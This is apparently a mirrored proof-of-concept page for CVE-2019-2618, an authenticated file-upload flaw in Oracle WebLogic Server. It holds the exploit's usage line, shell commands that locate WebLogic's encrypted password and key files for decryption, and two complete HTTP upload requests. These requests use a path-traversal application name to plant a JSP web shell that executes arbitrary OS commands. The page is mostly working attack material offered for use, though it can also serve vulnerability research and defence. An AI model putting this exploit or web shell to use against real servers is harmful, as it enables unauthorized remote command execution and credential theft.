Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-2618 PoC — Oracle Fusion Middleware WebLogic Server 访问控制错误漏洞

Source
https://github.com/jas502n/cve-2019-2618
Associated Vulnerability
Title:Oracle Fusion Middleware WebLogic Server 访问控制错误漏洞 (CVE-2019-2618)
Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的WebLogic Server组件10.3.6.0.0版本和12.1.3.0.0版本和12.2.1.3.0版本的WLS Core Components子组件存在安全漏洞。攻击者可利用该漏洞未授权
Description
Weblogic Upload Vuln(Need  username password)-CVE-2019-2618
Readme
# cve-2019-2618
Weblogic Upload Vuln(Need  username password)-CVE-2019-2618

## python使用

```

python CVE-2019-2618.py url username password

```
![](./python.jpg)
![](./shell.jpg)

## 解密weblogic密码
```
root@f0cb7e674d7e:~/Oracle# cat /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/security/boot.properties |grep pass
password={AES}dv/eNBsyg5GcDUbAKaQRheDZhzVk9yiTYVpXlGt9wEU=
root@f0cb7e674d7e:~/Oracle# find / -name "*SerializedSystemIni.dat*"
/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat
root@f0cb7e674d7e:~/Oracle# 

weblogic 账号密码: weblogic/Oracle@123
```
![](./decode-password.jpg)

## 使用docker搭建环境
参考vulnhub

```

root@kali:~/vulhub/weblogic/CVE-2017-10271# ls
1.png  docker-compose.yml  README.md  set_mirror.sh
root@kali:~/vulhub/weblogic/CVE-2017-10271# docker-compose up -d
```


![](./burp.jpg)

```
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: 10.10.20.166:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
username: weblogic
wl_request_type: app_upload
cache-control: no-cache
wl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/war
serverName: Jas502n
password: Oracle@123
content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
archive: true
server_version: 10.3.6.0
wl_upload_delta: true
Content-Length: 1081

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="shell.jsp"; filename="shell.jsp"
Content-Type: false

 <%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p;
    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
    }
    else{
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    }
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
    out.println(disr);
    disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML> 

------WebKitFormBoundary7MA4YWxkTrZu0gW--
```

## 也可以换个目录上传
```
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/bea_wls_deployment_internal.war
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/bea_wls_internal.war 这是上传的路径
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_deployment_internal
bea_wls_internal 
bea_wls_deployment_internal 在同目录
这是漏洞war位置
```
![](./bea_wls_deployment_internal.jpg)

```
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: 10.10.20.166:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
username: weblogic
wl_request_type: app_upload
cache-control: no-cache
wl_upload_application_name: /../tmp/_WL_internal/bea_wls_deployment_internal/gyuitk/war
serverName: Jas502n
password: Oracle@123
content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
archive: true
server_version: 10.3.6.0
wl_upload_delta: true
Content-Length: 1084

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="shell.jsp"; filename="shell111.jsp"
Content-Type: false

 <%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p;
    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
    }
    else{
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    }
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
    out.println(disr);
    disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML> 

------WebKitFormBoundary7MA4YWxkTrZu0gW--
```
File Snapshot

 [4.0K]  /data/pocs/fd03a08921be454c72d6d974aa6f12c792a16839
├── [454K]  bea_wls_deployment_internal.jpg
├── [292K]  burp.jpg
├── [3.9K]  cve-2019-2618.py
├── [ 22K]  decode-password.jpg
├── [506K]  python.jpg
├── [4.7K]  README.md
└── [269K]  shell.jpg

0 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.